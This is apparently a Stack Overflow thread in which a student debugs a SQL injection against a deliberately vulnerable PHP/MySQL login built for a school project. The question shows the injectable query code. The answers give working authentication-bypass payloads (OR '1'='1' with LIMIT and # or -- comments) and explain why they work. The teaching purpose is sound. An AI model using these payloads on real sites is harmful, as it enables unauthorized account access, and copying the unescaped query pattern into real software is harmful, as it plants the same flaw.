# My SQL injection doesn't seem to work?

Tags: php, mysql, sql-injection

I have to do a project for school about a number of different web vulnerabilities (SQL, XSS, CSRF, etc), and I've made a very simple website to demonstrate the attacks on. But for some reason, I just cannot get SQL injection to work by attacking the login.

Here is the simple login code:

```
$query = "SELECT * FROM customer WHERE cMAIL='$cmail' AND cPWD='$cpwd'";
$res = mysql_query($query) or die(mysql_error());
echo $query . mysql_error();
$count = mysql_num_rows($res);

if ($count == 1) {
    echo " Reached target!";
    session_start();
    $_SESSION["cmail"] = $cmail;
    $_SESSION["cpwd"] = $cpwd;
} else {}
```

A lot of the echo stuff is so I can follow the injection to see what happens, but it gives me weird results.

If I login as one of the customers; username: jjones@mit.edu, password = 123abc, it gives me the expected response:

> SELECT * FROM customer WHERE cMAIL='jjones@mit.edu' AND cPWD='123abc'
>   Reached target!

This is what it echos in the browser, just to be clear!

And session is created for jjones. But if I do this: username: 1' OR '1'='1, password:(empty) it echoes this:

> SELECT * FROM customer WHERE cMAIL='1' OR '1'='1' AND cPWD=''

No errors or anything. I've echo'd $count and it says 0 rows are selected from the database. So the injection is sound, but I'm not getting any rows based off the query. How do I solve this?

Comment: For how many rows is `cPWD=''` true?

Comment: Your injected SQL allows the rest of the original query to go on. As Oli points out, `cPWD=''` is probably not true for any rows. You'd typically use something like `1' OR 1=1; --` to prevent the rest of the query from executing.

Comment: @ChrisHayes It is not allowing me to end the query with #, --, /*, etc. I think it is because there is a single-quote mark at the end, so it ends up being `cMAIL='1' OR 1=1; -- ' AND ...`. The last mark kills the query I think.

Comment: So I tried something based on what Oli and Chris said; I used `1' OR '1'='1` in both username and password fields, and it returned the 2 user rows from the DB, so the injection works (all I have to do now is find a way to limit the result to 1 row). I would still like to know why the comment `--` doesn't work though.

Comment: Have to say, a great topic for a school project, respect to your teacher!

Comment: You are doing this for school and they taught you to use mysql instead of mysqli and the Object Oriented style? Nice teacher. You need to `INSERT` some HTML or quotes or something.

Comment: @PHPglue I guess you didn't read the part where I said "very simple website to demonstrate the attacks on".

Comment: @PHPglue the topic seems to be showing vulnerabilities and making mistakes. Maybe not using `mysqli` is a good example.

Comment: You need to `INSERT` some HTML or quotes or something into a your database to emulate an attack. Not using `mysqli::real_escape_string()` and just putting something into an `<input type='text' />` as a Client can produce the attack.

Answer (score 2, accepted):

You could produce

```
SELECT * FROM customer WHERE cMAIL='1' OR '1'='1' LIMIT 0,1;# AND cPWD=''
```

With user:

```
1' OR '1'='1' LIMIT 0,1;#
```

And password empty.

Comment: I suddently realize that the problem must be the count!

Comment: This worked perfectly. But why did `#` work when `--` and `/*` didn't?

Comment: because **#** comment what is after, in a single line

Answer (score 2):

To bypass login check, you should build a query that meet the following specification:

1. Limit to only **one** row. (LIMIT)
2. WHERE clause always be true. (boolean calculation)

So @Ignacio Ocampo 's solution is exactly the right one.

BTW, there's one thing you should consider in SQL injection. If magic_quotes_gpc enabled, PHP will automatically convert `'` to `\'`.

Comment: +1 for magic quotes, but -1 because if they were enabled they would show up in the OP's output ;)

Comment: Indeed +1 for the magic_quotes_gpc thingy, I did not know that. Thanks!

Answer (score 0):

You can demonstrate SQL injection in your example by setting username to

```
1' OR 1=1; --
```

This will make your final query :

```
SELECT * FROM customer WHERE cMAIL='1' OR 1=1; -- AND cPWD=''
```

This comments out the password check.

Answer (score 0):

You have to put something down for the password field.  Right now the query must match password to blank ("").

Something like the following will make you a smart bad-guy

```
Username: 1' OR '1' = '1 
Password: doesntmatter' OR '1' = '1
```

This translates to

```
SELECT * 
FROM customer 
WHERE cMAIL='1' OR '1'='1' 
   AND cPWD='doesntmatter' OR '1' = '1'
```

Comment: This would work / works, if it wasn't for the fact that there are 2 user entries in the DB, making mysql_num_rows return 2 and not 1. Obviously would work if I had coded it in a while-loop though!